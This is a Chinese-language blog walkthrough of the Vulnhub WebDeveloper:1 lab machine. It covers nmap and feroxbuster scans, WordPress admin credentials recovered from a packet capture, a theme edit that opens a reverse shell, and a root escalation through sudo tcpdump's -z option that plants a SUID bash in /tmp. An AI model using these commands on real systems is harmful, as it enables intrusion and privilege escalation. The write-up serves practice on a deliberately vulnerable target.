Vulnhub:WebDeveloper:1靶机

kali:192.168.111.111

靶机:192.168.111.243

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.243

image

目录爆破发现ipdata目录

feroxbuster -k -d 1 --url http://192.168.111.243/ -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1

image

进入该目录发现一个流量包,下载使用wireshark打开

image

查看后发现wordpress后台用户密码:webdeveloper|Te5eQg&4sBS!Yr$)wf%(DcAd

image

进入后台后修改网页源码为反弹shell

image

获得反弹shell

image

提权

查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码

image

切换到webdeveloper用户后查看sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/tcpdump/#sudo

image

提升为root

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/shell.sh
chmod 777 /tmp/shell.sh
sudo -u root /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
/tmp/bash -p

image

image

flag

image

posted @ 2023-03-27 16:48  ctostm  阅读(77)  评论(0)    收藏  举报